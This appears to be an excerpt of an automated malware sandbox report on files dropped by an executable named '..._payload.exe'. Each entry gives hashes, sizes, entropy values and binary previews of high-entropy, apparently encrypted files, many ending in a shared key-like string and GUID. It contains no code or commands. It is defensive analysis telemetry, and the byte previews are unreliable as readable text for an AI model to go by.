                                                                                                SSDEEP:48:RbLmlST7ZskeD/bAbVOViPdBtOMNp/vmKGbmLD:Jmq7ZwD/yPdrO45vxGi
                                                                                                MD5:0A00A202EAFF983CA0E48629E9856480
                                                                                                SHA1:36B51EA016FC4EF0BAB0F52BC0B27C1CEF37187A
                                                                                                SHA-256:1D1108C0792A431263B35DCEA0CA92886711F0FB16E9EDE3D13F4068281FA313
                                                                                                SHA-512:A5F4E4085CABA58EA4C94824837FAAD74EC44ADE0925C9BA696C9D9DF07B3BDD6CD52C0B1347328B3C1A656AD9445590F0E8C1EF3E0F560F1D3F9E2532C1B235
                                                                                                Malicious:false
                                                                                                Preview:<?xml....;,...m...v.._Z.d.......&..e.Uj..t..s........n.ZY-. ....E<..}.j.0K....QDrn.mn....=.........@#>.}...e...............=.s%.?k s.a.XP.4.....2...i8.nQ[k.....}..XS...7.....{....t.=+#O...!.i.......B3:./...^8Jxo.....np6r...).q..G9..U......=R.Y....p..:.S........}.."<...>..>;.......ul..8....e...X.....:.b{.n....C.d.(`.!.m ./.I/..W...Gn .`..'..{.S..t*9....]..-V.a?f.A.KZg........[A..~=6.x..6.T...~..d..Q.Or<....].N.q.So.X) .)..Y....1.i.....0$0J"S0E1..=.1..[:..Yn9...vU....*B._d...12.d.....mZ.*~.i._u.5&2-2Ed.M.)...........2.g..B...w.)...g^..A%.(..@.....0.q....~...../..]u_...d....y...-.....E..s.-..cA....n......@..j.i.]./=.[/.uH%,.r.i...Yh.8mq..nKch.?....V.^....00...(.>...#4M.....(...N....G....IF.v....f..8...M/....L>.DE..1..\<y7I.P...(.....6............o...).J.'..4..2..q.!....J+?@....H...L%`Z.....Q...........0...+)m@+.E.z5.e..O...cR..=..I...`w.....j....L...g.c....(.....#'...=.d.?..g..E..Y..X5.h,...l........o|....y..y\F.1..._1N..d.s
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):886
                                                                                                Entropy (8bit):7.7571030820088795
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JN+D+hHpfaVskGcuhQzX+kL/IGvX8aZrDZGdq1ySx3bD:J46HMVse2QzX+SrZrdGc1rLD
                                                                                                MD5:1E8899C4F728E4646A9B7662523208C0
                                                                                                SHA1:444ABF6CF36D62E65A0B5907373B1AC305776E6C
                                                                                                SHA-256:7D9097A87C1E00871EF8F88BB0F59B371ED6E558E0CE3DD8CD8BCC152E7B9FCE
                                                                                                SHA-512:F5B14682EF73CDCF7FA25B39EE697624E978B60BB6FF5A91F055F548C5A27C681A915924AE2AD4072E58FA61989D6BEC04EABA0C07C6D78CF594A6F8565BA5A2
                                                                                                Malicious:false
                                                                                                Preview:<?xml.q.th;I...W6...0.K.*Z......A..IU....Pu.3.+0VWcT}G....&W]..N.b.2^d..f..'....H[.....Q.d..D`*........Y.PI..H.%..,.'..Fh7'..k.cE..>.N&m....2..Y....A..G.1.i.aD..#\S.. p.B\R...SX$r.y......o.O..D..vo..j.0@.FH..1.......*Eh..+.0...HU..J.f.8 ...T....+.%.).&b7..r8.t..[.g...E.r!..e....<.....d."=w...+....,....".'...?.U..u..r..pdG-..;.hh.......c'.8du..r.h.G.T*.8%...R..u..D....U.!#IH.....$...-.d..0.{.o....7..7..).W...M."jt.`Q.....<.$&...N..5..i.Nk.@.......3.^X=B....2....R<.o....fd..V....6..p=)..e.>!..z..&...q...H....e.D.~...h....:i.Ok.&r.....N.....6{......4.!.r....su.......j(....;.... .....t......qN..h....Q..b...YL.....}.fkT.Sp3\.0.'clM.j.....#n.]'8.<._..sI.9.u..r*..k..0.wn........wz.k...e..:...i...Y..{.>.ccd.>.#5..k|........b.[....?..GM.X..>"T*;<[.fNk.......rYm..v...J)..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1324
                                                                                                Entropy (8bit):7.865055961041169
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ILf8R/1mgacpCwtyRQqzPgEvn+FVVxiIFOgl8+vZyHQaJoBO6xfYmzxfx3bD:IoR/1mVwQRfgin+FVVplXwQbv3zrLD
                                                                                                MD5:61F4D6AD905F4810DEFEF75A59D16B5F
                                                                                                SHA1:6BE9DF646281D9D9B549EB6D4A6C51DDB0C6362D
                                                                                                SHA-256:9E7A39A22EA382FDDC32E257F76966914BFB9EDBA2102F05CE5257C08C4CDC53
                                                                                                SHA-512:94D1F4C57979D44FCFC8E5289658DF537651C57A57DD601A6846BDB9B8DD1ABD04B92656257E6402C39CCAA788ADF33DDE78E393993D361DB0E25162488F29EE
                                                                                                Malicious:false
                                                                                                Preview:<?xml..h'Q.>~...K...[.40..U*!....lhl..t{.e6.a....6.ww#.........._;..s..>..(.......31e.u5..}..qS...4.T.v._x..6....x...i.........H.r....$. @.&....h...cr.F=..).1...t..8D...^..K.o.-.n.......M.[..2/.r.._...J...4....Z..B.F..s..Tq7?.@.!..f;,..z.}.hx.`......m..E6..n{}<..(G...x.<..M.q..y.....V..le...4..y.T.>......q-.......3.\......&#q..7.p..m.......\=...yA.?G.....1."r7.!..8.Ea..I'..1....$U....R":..,7..x....V`..r.........'..\.&..~.P....y...WwaC.m.m.].`......b./....=h.k...T...B.'...f.Wgl+O..t=nb.J...t..>.......1.0...<....n.jn..c.@t. R......l..N....e.*.;(...[>n.y.....U=.:.>....'.3..=..q......(.s..$..^.Rc:I..-...kw....b{r..a..j>?.`...8-xL._...N.0.._..8..qO5.,).2.........cM..-./X.6|.,....D.0Shy.|w.1.....1....x.X..... id.....&.>.*.i..d.J..D}.3t6-.....D..Ms..*...)...H..(...A.....k.C.....U...D.5..8a.4.8...q.#"V...6?-...04....d.D.gI:..>.g..R.7,.e..X.....L.b..D.........A..q..p......K..T.......A..../.]. .....!(..0...wc...Q.........hCg..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1435
                                                                                                Entropy (8bit):7.843859155691029
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:HDwi6xrrK4TTk5eswq9hV6eAFlElCnFMX9HzLBTZFpY1OUvKNNWKA2KAx3bD:HDdu/zTaeswqbqTuzLdZQ7vKv42KsLD
                                                                                                MD5:3D29AAE8CF5C0BCFF28B7E1B46729CC4
                                                                                                SHA1:A2E0F564DBF73F57F9F185D8877AA4938A0CBE6D
                                                                                                SHA-256:862FE0D7EB93FC40300584BE7F7107B7DEE7203C8EDB0F1EF0AD292823901EA0
                                                                                                SHA-512:F951262215C244DFB0822099DC6DD50E8E7052C5F35DA2511F185B81CA94A56215992F7C593D73B1998BE41995BA7632B2FD267031904128B3DA2909AF6A854F
                                                                                                Malicious:false
                                                                                                Preview:<?xml^9s.o..K...o..J.5.}.\..PAC.....o\...?..).D..=....E.;...b......r...r.....i.....C1.&.6D;I...E..}J.....!.+...y...f.+l1z.qQz.5..`^.Z..%.<.LW.I...e..rA.....G v._U...>n..@.......... _h..f.,.j.q5..%....Cw`.rX .....f\...7Z.|.%.\o.3].L...mpj....a...>....v.d6.@nG~1...52=[..62.Fw.d.qU.S..SU../{6.CX./.s$..?. .i.f.mLa]&]{.G9d)..............r>W1..m.^...m..z.MSK...`..P.{?@b..vG.q7g...N<...1.Y'WU'.f..\...%1...d....,.b}../b..L....[./.%.A....C.......S.%..?..Y_.D.B/:u.5..a`......\.p..8....Fg......C.......-.A..\...P>..R..rnj...}.Y...S...-X."..[.".C.Q.c..KD.._@Y..<....o..W...#.`.Qc...3h.Ek*t..4qJ....9..G.V...g%.}.#.#.E.+.ZA.Z)^P....f9n..a@..B.Lm../..+q.7x.].......=...X.....9i...m..M.e;.....[W.....X.w...HR...;c..8.(..x.[.fN`.$x.E.2}..1.>...C.......p.FVW.n#l...).ei............@...u>..........%..k6..|5.:y....!....f.....x.G...T~.Mj..=!#..UY.._..mMDbx....lP...'...(...<.;....Z.7..4......Q...b::xI..... .<.r=...P.W......7.e.....E!.k.....'....v.......B.RY.1
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7119
                                                                                                Entropy (8bit):7.9722908389385605
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:u91KjbZCpc67kSmjLpGA0zHRPNPfU0iIB4cD9B:u9UUuOKj8A+A0iIBt
                                                                                                MD5:B4D1D9728BA4F30F8C7FC0712B66957F
                                                                                                SHA1:2EAFB1AD81D296E0F191A77493A3C66E009196F1
                                                                                                SHA-256:FC80B9A163FD9D6D5075B8A3ACB59168A97107E77E522A5614A03A757DA5C3DE
                                                                                                SHA-512:BA969D61C4D9E7E148E21069B7A1890C66267ECD1FE5BE53DA3A1862F9495F2D613CE0DF00B40E4F9926A52F3A101DBD8AC398953015F4E5195230F4377BE2A3
                                                                                                Malicious:false
                                                                                                Preview:<?xml.7g..-z.t^.y^...:..B].........U.Pa9R.m........./...3:.r.H.....8Y/..D....Cnm."..F.$l...z."n~G......?....td/..\.P.tN....\wq.......B..K..f....;..tA..6.yE.\H.9.....5hDz....$z1.3...xz...1*.M.].*..F..2...:.N.*..O.....@....F...s.......5...a...W...Z.....;..OX....'.*hW..F|....5..7>../.;BT.f7&..a4....:...^3........em.9..\...q:..e...../....D..n.K.....So....PA...k.,W.....S.v.&dkr...L6/...9..f...Q.l./o..p..[HL.8.e.......~LM...1U)j;..o\...<.....;...7F....z.|..t...I<W..78...4.#w.$4..a..V.......!]8..vK.*.<!..l...\..zb.|.....|....[..,.=..PG1.T..1g.r..9a@..*.....rB%.:n.z..[........=..TC..$.Lg...j.Q..[.l.2..N...4.S.......l..+A:..I..{.......n.-..v.i...x.b..N...t..9....XB....L.M..7.^.u,.n.Gby....9..+r..<!gl.8.P.1..X...g....`...k....O\RE."_..Z.d-......G.l.:......Ul..i..H..>V@t>..8x......Q...x:.1.(...e...kJ.*B....~1.7A..u0 ..!.....G.8...3KVd,|.\w............n6.N.....C#..qw.....R..N..........^.. .....q..e3^'..S.s6...gu.Cq.7x.I.h......>ZA2.X.....@.$........WA~M
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):762
                                                                                                Entropy (8bit):7.691406828045733
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:sss8f5wbyhrvz2sLj9wrpzUcMV5VlbQplmHftFfriMRbQEJp/QGzD7OKH3RAxzdr:s18fzusPqrpzUcMtlbQbmHfjhpQEJOGc
                                                                                                MD5:BBEE284DA5CFB90DEBB6C8C558083A48
                                                                                                SHA1:943B8AD4A6A9E14101D2C413EB878BD28C50F7DD
                                                                                                SHA-256:1175776842A5518D5D3557476FDC0BD073123700FF06D6C356BE3483D67BB547
                                                                                                SHA-512:F2AFBC8F36B1E4E0B887525A8727FFFEE64CE9876289ADDAD5B3B6AFF9068EB77635C4E4E1DC0ED9E365CA9756FF00F2B833DCFD65D3D37DA4A930DDB2611B39
                                                                                                Malicious:false
                                                                                                Preview:<?xml.q.n|^c<.<sukm...&.>..>v.a..F.0On|.x1\D+.h...Zi.....r......a.@h....H?Y.L.c.._.`..A7.K.).tJ(.7.f.b..Y-C...E...<;....K._.O....(?..{.S.wG.../.."..`.Q.pIk...`>.M.]W...j./..*XA.....h.....4'...3.......O..G.....7......a...o..........:.K.3^.. V.C../..=Ft....+0O..zV n.X....a......S.{.^..#.)5.(>..i.9EB.D.....!C.Tw.F..YR.p...s....hV....V...bx'..61P;.....O.1<.hg.....=.j.w.FF.C......5...+_...........1.t.y.....&.h.T.%..AC.q...._x5.....w...`.N.Q?...f.:.R.rq.R5'.e.e...........45k|sP...l'>S..V...{....>.......1.......]g......Z..N"...i......E(.]./.)V....B#...A..S....tC.],..D...E.!.6...7..b2K.....V...Bv...^..M.....~..u.....||..r.X..a.....e..4.z.~.dL.X.c...*3D.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1463
                                                                                                Entropy (8bit):7.844918183756734
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4Dcq40fz8mH5J2tQA1rFdIauuDgUGRBwZhDkDKkbKkjxR62VrG2f9zwHgx3bD:4Iq3fz8O2SAhFmauuDgUNDkOb+R62V2o
                                                                                                MD5:96BD601F781CAEADDD4FD3B92374C954
                                                                                                SHA1:3A2C6C63E46C4468DF7F3A668A19D97E9EE8A78E
                                                                                                SHA-256:D6FECFB6B04A506705C1F1BD145D7A56A13EB6894E79C1D902A3291CC2785A8E
                                                                                                SHA-512:16F9B9DE884AC90ED796DB867205BA4245A0CAB005286A9DAFF67ED1D4AA7F8AB37C9BB42B057AFB88D064D373A18497AE2B9C3B516596C734E26D42F1E9699F
                                                                                                Malicious:false
                                                                                                Preview:<?xml.Mg.....&.e[.$.....6...*%.E.^..-.......i....{.)}.C.3.3r....n.F.E....E..=.4....@.....h.e..a93..y.@..Z..:.........h.j.nW..*fo........'[P.L."NUV9.s.n.......)U..k........@.. ....z..oI.gkR........#a#..4.....B...9uOF.f.'."F....n.B...=.m(DZ.4T..Z.nw..;x...6..=..a?.k..`d...U.n/.....N.,w.?...A...a>a...K.......z.d...'..............T:..:.j.....e.._.LAE... }...S*..D*.).-..;.d.YDm.._p...0.n.j.@........l.;..D3%?./.........m.w.N>..`;..X.I/+.K.V.......lFO.k..h...-.....0....I....h|..H...X.$.6.a...4eE.~....g~.%.b..........I..n.A.y..f..x.1.y).T"(.IV......;}..8.y..~.;...........TX.f..4.=n......r.Y'.7.y;)6.6.b6..........D{X...G..A.1.}....r..Y.".}.....E.. .7..ID.....V.S.w........Gy.Gt{.d.....C........e!7.P.F.zwTj!.K.....m....:k...N:=-A..........g..m.D^..7a.....c7...Z.7.xw;.C...lr.9........+.(.w..'......{v...a..}u:....i}.>[eCg......Sxk6Pq.q.e\......./.w.:.k..D3$........;........F}.....s..]b/..E...1(......^Y...|..|w....Tr..A.g..Y..R..W.Q.R.0U...?\
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3505
                                                                                                Entropy (8bit):7.9428193771816735
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:tW0xYcFeDCLKC7yPCIm5f6mIy+gAMxxYO+j3F310ZZMkVh:dxB8OLZKnm16mlxxf+TF34MC
                                                                                                MD5:D48D134D8BBD684D7F486D76B671D0B0
                                                                                                SHA1:71491428B4A20A89F876B96814A06BDC4D7F1743
                                                                                                SHA-256:750C42DD0686A390838AF40A2832D2F29EB885EB5CA53198C8CC277DC9D0CFB5
                                                                                                SHA-512:0C3744BEA12D6EC86A89EE0E9E3861AD5E802E2975B8A0131F4B0190FD3CA90F9222E6D61109DBCCEF75A91CE4DB71786E56ACB56FFDDE7CC1B50209ECD4984A
                                                                                                Malicious:false
                                                                                                Preview:<?xml.Y..&IP..G..+...........Aj..z1...R....$.los.;....Hf....K.....`....z..up.'....N..v.m\..t,.q!}F..q..w...Ep.|..E B.o.]..Q..+C+.(PJ..)...o.*.s....1.?.&.g7.n..Y.kXf.W+.X./.......1:.......H..R....=.9.n..7B$.%h*..p........WE@.7.,.~R.T.V.pY.cK....9......*y.........~v...Un..N..3.3t(f......U....#s...0L..C.N...b..d.J.8.*-X....K.r..b.VH^jM...;q.~?.s.9.J....X>...D......W...wY..^&..]..*....Y8.'...u...i..y....X..4...#v..\..[..'..SY.Z.......g.v.....1.P.:..I..ic...IC...c\.q...d ....wy^...d..,uQ.U!..o.3.......F.......z....T....3.k.|94K.....[j...A.. ..3e.n.8j0..tA..s*Da.............d|S.\n....[....3i.q....}....X..P..-...J'#.J....Y.l`z......I.Z.C]y.7...v.M.t+.....F..qr....i..B.....v..r.G.@......I..%.#...L..}X ...J...u.%.|..#15G..?b...c..j!x...........l~.h_E..2.)...#*..n.Z;w\R.....*h...k.......u|......A.{..xVe6...-..mT..d..g..Do....}w.>.w...S...Nc..@..q.]}.`.n(S........6.W.H!t3\..ulL.{S.^fG..Bn%!......Z... JJ... H..g.......cu....Ar...x..".....&!.a%
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):965
                                                                                                Entropy (8bit):7.780001535005224
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0MUmGfkZu4jaYCA7HUddCzqtDs3aa4a8SeqpYBAybps6box3bD:0D/fj4j1CmgAQDcZ7GqNytsmkLD
                                                                                                MD5:B0E18A93C1D91041D41ACFC8E3CEE6D5
                                                                                                SHA1:AF8C1CC460EEA446628F0D9B1754DECB790B5B61
                                                                                                SHA-256:53241738F54830549CB0DAE2A1669AC44C924D1F0AC60F4E5804420C6CA962B8
                                                                                                SHA-512:E66DB576BBDC1CEA92FB27D2EA000DFB69227987945A26C4E105937C3891DCF0EB20E02892ADA12C5CDB9DE351BF2C130E1B9A604D196DF4A13B58CFB16F2C69
                                                                                                Malicious:false
                                                                                                Preview:<?xml..w'6..|w.K.D..o...b.....g.{.k..\..... ..H..G..Ao......u.T...]...D:. [...1..0J.*..H..u.JN/y.#.......yS...r.,.....x....A/..x........4....V.F.....*..b.....T......V..Lr~,ce.OY5yh.t......MM...+..~ZS.....0.Qy.._%....u.I.4`..N......t.t........l}....K.m...K.A7W.......\......HBJ..R..........[.]..f.(5.*=XC7..G....&....c6..Nm....v(./...Ve..F....!.EIJ...Y....aH|!.U\+zr.Y...8.....s.=..!..Qs.}e7...y..#..j..^.f....)...K.C.6.S.^..?....L...X{........O..A...5..!p.o49.j.... ...6.Qlr".]U..H.,.>.5......5>.....xm.Qy..0d.s.X...{^9,..%/j.mm.W....fal.|U.Vt..\.>.;F...Y..=....*....7..k..3....s....Q..~.<#>..{......Wrp........o.'.....*.T.k.U.o.q....*....&GB.B.s.N~.r(.1...OH?H..8..6...4&\Mi....@......6..5.".WK....>...mT.?.c.....(...B|.3R.6Dx<|..........h....-....KOC..J..&.<....^]...]..........B....V..$4t.....!.V......8.|..b$*.K.....\.Xf.....`A.P...l`%!...4..w.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2983
                                                                                                Entropy (8bit):7.932129955508164
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:kR6DmPReDbseDdiymMABHBq1e7NlHNJWqcuwiaiJry52lK32UGGKUvDBKnLD:eo+R4bseDdiVNr7NvQQwi7Jw2s2UGfn
                                                                                                MD5:4EF04090CE651B6B386DA2CB100A5C54
                                                                                                SHA1:92FEBB23E962B6019F37BFEAD5665AB400D8B657
                                                                                                SHA-256:2D60BDABFCFD1C1E65F02D3E55FCE45A8B7751DC1662AA8451C0E866D06A0B71
                                                                                                SHA-512:894424E16944A1D4C9C47D26D09612E48E9FDD6BA2DCA3DB2C6F8F0461703C8472F611D031BF3A6ED80E5BEAA6D1E5A2B011715133BEFC50242A64C8BFFAFF53
                                                                                                Malicious:false
                                                                                                Preview:<?xml.lV.9.uk.T.M.......a/Z.i."y.I.w..Kh`...~.%..<........C.6....t..=.,.&6A..c..>K..2....N....].|..G{r.?K....e.,$`.C$...v.>.sV..I..$..Q.k.?e.6x.z........*+.bR)i..1..;.3y...M620..e ..I..>...M!rU<f...o.-.CF..j.&0.*..c...M..../.&R.....s..wS...&..(.y..[.c2.....n....X....9....f..F.Lh.'.r.........5..Ep.NOB...4[...U.M..}..y..s...5.T..S.j?..ZU..b3.m.:.{.1....\..V.[......7|Lc......~.]$<...o.....|..E.78...B.;.%....`..V5...`y..d.#.}..Z.......L.L..o...p.+..C.-y.......};......7.......3b...t...CC.+<bI^.2..[vVs.-.ZM.~...4.J..x6....C_.x.P..`.....^...j.ej.'Z.cp.2.@s.~..w.u|.G."..R..o.vm. ...kp....:....."{...&.\..$R.0.^._.s.n..<o-.z.3....$.\|....s1.j..d...1mR~...%..W....6...>._+.R..H..(......9...Q..).M...mt...j....l..c.>..'..L~.u.jech...u.......c...+..k".....>...6.T.9Ul....U..U4...+B....A....;_^.~P#[)U.R.Y.b{..\1.g.t...@.b].F.H89@..0..&..>r.n*E...b......YI...=.C7VQ.y}...E......N'..'.."..t%]Y.*.......u?...\...^.FF{..........M..|4..Q.1.../.<Q$.....lbV.`5..i#.8.(.'
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2487
                                                                                                Entropy (8bit):7.91865814410907
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:m9id0k+496YdJS3I+hA3fDXB1B/QwUFUGDtyWq3L7Ry1VXVWba4xLD:m26YdJSY/l1uwUKGIWCL1y5WOW
                                                                                                MD5:B5750D83056E73312F5FDB0C270B579B
                                                                                                SHA1:8376D079EF7AB078883D25849236AB296D6A3C92
                                                                                                SHA-256:C46C057795893C57161A44E3E8409282CE92E6F1FF90112C9F62B7C006EF2EE4
                                                                                                SHA-512:1471DD4243B55389A2649C42B40A82787DAB88897220C6D4CF4420881DB950758BB9E40815E249B94DD3089F15BCE0D6CD350A0E74C1CDBD8C2C5A4409089BAE
                                                                                                Malicious:false
                                                                                                Preview:<?xml5>....:.-'.`...ui...g.f.....E...fY!@.....B...G;.%.tju.4x..6...az.=.A.q.9...c...x4....M]..q..y.K.r9^T...m...:.4L.E.....(:~r..(..(w1..=*.."c Q4.eK~[Z..<.65...j_b0.....2......[....-.G..T..S.u....w.....c\K..z.VCd.E}...5d!./..............6..D<.:..3c..._..!.......`c....$..).u..B%...T@.....*Fp.LT..?. .O..m.{.1..g-l{..:%/He.1.1..H.0....,..sp....5..{(~.....ke.8.:+B..5..h..,l;.E..Ad\...r...M}.R.....v~....k..._0..w...LQ......~+.C.....-xPDL.+[..iV...9....OW.u....*Y..0.....1.#E...Z.....l.e...... ....>.w....`..e......^...6|Emn..g._..D...a...`8..........L4+K...U... _1.....U.e.....Jrp.J...Q._.:..lu....x.....M..jb..}....%D8..k....Jx.i..#.......EKj.!..!.H...I.\[..%..".u.....B..{^i.x8.T..x..(,s>7..........S....t.'U...l. .j.V........".z^^/p...u..B.....~..NWe]..... ..W...U"...D..\.-....Z .s.jnqt.e..;".....jG.v..T.....w.*#...k...f9pF.[Lq....6.zP.S;U.F..@*.4.*....!.....v......T........1..).. ..........X-F.....?.t...@........w.....eU....T.k.{6..`._X9."
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3132
                                                                                                Entropy (8bit):7.932218995213074
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:y8wAGSJragB6rCbomSbDN0vbAabrGCEv2liX2bkJguDolqKQzHWJzE0NWmbDDLD:CASgMYomSl0zZE+AukueoQwJzE0Nj
                                                                                                MD5:75756426C16FA63F2835A87BD556B453
                                                                                                SHA1:9028CF1CF08A30307A08F0E6EE51627FD3C2B0FA
                                                                                                SHA-256:3388316F328C83E50426F186E9E0F6C89B4ECD7A415D05D312E71D2AB1A9C70D
                                                                                                SHA-512:5CB4D7D84FCB32098027CE792C9476E8460C97E6B211845C0AB20610FDBCF2D70C73E22D51268628E250FC778C28C1D842846949DE598179DCCA5AC7242CA270
                                                                                                Malicious:false
                                                                                                Preview:<?xml..!.b]I...%y\Ds.W....8..).Sm....B.;[d#.u..8HE.e....Y..t. P......;...q..&........&93..i..s..>`...;.w..=.Y.........L.......i.....p.O..@.E...i>.}5W........k..\\CY.vm....o........o...8(.......;..u.......[........r....x..=Hg......*....Ic.....(.$........M.Q...u...............EN).....M.....`.O.....7...../X2.I....J.<..-.....+WA.NX(E.n......f.*.U.kR..$|.h._..q...0.|*..:.dG......j..v....`q.I.:..B...,..4.zs...0.;Z..(....j..,:,...}...M.7F.*..X.,q.9.....s.}.t'g..K..4.k.."8c~U....y}m.8R..W.B..J........g..n} +.a.d.4\;..`.p....".t.2.$g.B.4X.aD9RA.jsO.)|X*..X:..h...q=.=?..F..5.FU.gN_..gCLoV.`T A.kA-...9x|0.VG%..$.!`..:...^9Ef..O..._..Q>$..R..U..X....9H".%_:@..4...dD..0..4#.."K.a..sc....0w#.....c9.v....yn.j]y....g...t.w.....q~.;m=0...............5.;]..7......WB..i..$....=..8|~[u.K.`..i{..i.*:........CY5.9.yH.Di2.3.o.....m..bp4..}.6K.....U{....c*`.qNhK{C.d....K..;I..^8l..kI\..=.v.g......H..a.4....qk.b@D...v...u.Z.'I......L.Xt'z..10..W.c....?$C9w...Z..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4968
                                                                                                Entropy (8bit):7.961423746969857
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:9WFfvRyR6Nmq+oZgufZYWFST9WKOzEK+v7Ifl6uNOGmnEsyohFN5:9+xyR6P+oZguf3FYo/RNOpnE1ohFN5
                                                                                                MD5:1A723CFB9212556FDCC96140EB6B20F5
                                                                                                SHA1:81FD288D98D0E6175FEA7DCE0C19E1E712C01282
                                                                                                SHA-256:B1D677C1D5D643EA17A0479DAD94C14CE76998C075164FA2523B48A0F7624AA6
                                                                                                SHA-512:32024DE6AB9F3E00195B0067524D44888425C1F5ABEDD3BC0C1E1634F803AEF9DD16D88CC04D434A9477D7F4F38E6469EE39B3994CB36696512135D20EC2A55B
                                                                                                Malicious:false
                                                                                                Preview:<?xmlfK{..............7.P.....2....#...G..W.e.?.T.v....2...%j..A...........^...z.WQ..X_1M.....y...i.. 71.I.y...s...(......[..s.qB*.2C...].k....6.;.5\8..-.f..Ah.....f......Z...&,/.b..E...hp......]z..........>.K..t.I.,....1*..nv..B...h.|...S.#2.p.+B..k..t.m.>.R./....@....6..bk....S.l.oG..%.\...)....>G....../.<p..xJ..?.y...#L.6H.Lv`.MD..R..;....G...G.()D$6...3.O..h...]y*0...q..P.BM....+......r..)S.vD....k.>..@....0.{.5..O..O.|.J....T..^!+...4..F.a...D..V.l....d..t..Fj.g....I7...f...V.... 1.RSf.5....4...}I.6.%l<.e./._.r.cf)\.{.^...3.(j.`1$S..j.....'....xR..R......$...2^qL8.?.........3X}.....v..Y.Q...q........wt5..U.+|q(5iX.@..'..Vd..A.,....\ys..M.,@K....m..hec.r9.Yk..N.%....;..%}...jZg.'...r..hwz....)..<(..J..l..B1F.......sN..@...v.l...`........L.m.0._.fB........MH.*..X../.......m.9_....@...O....P....F...&tO.U...x...........2.....8".Rxt.2y..w=....A....-.,)dkR.R^..../.B.KL.....o{O|.~.6...x..~v.R..c..._F.p..s!..X....z......6.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7596
                                                                                                Entropy (8bit):7.974503645331743
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:dDm36JZoZV0cWvTH6TMgwRiWc7j8PP6z5e41TwPUt:dDgcZo2m4gcih7W6FF1F
                                                                                                MD5:396B06D133F57E173F55B12533994B63
                                                                                                SHA1:E56341DED6E7C4FCC48D98E475DB830A855973EB
                                                                                                SHA-256:66C7352E4D4BC79AB28A740FEFEE7E0F64FFA0D25B5BF40CE817E6F6F31F662C
                                                                                                SHA-512:A9D406C8FF57C15AAE65F2DBFB24ADE623A60AA742617146B239FDEA756E56B084CD9B2BCA08183E7BDAF0353FFAD3968631DC3B4970AE015DC1C59F1ED5BCA2
                                                                                                Malicious:false
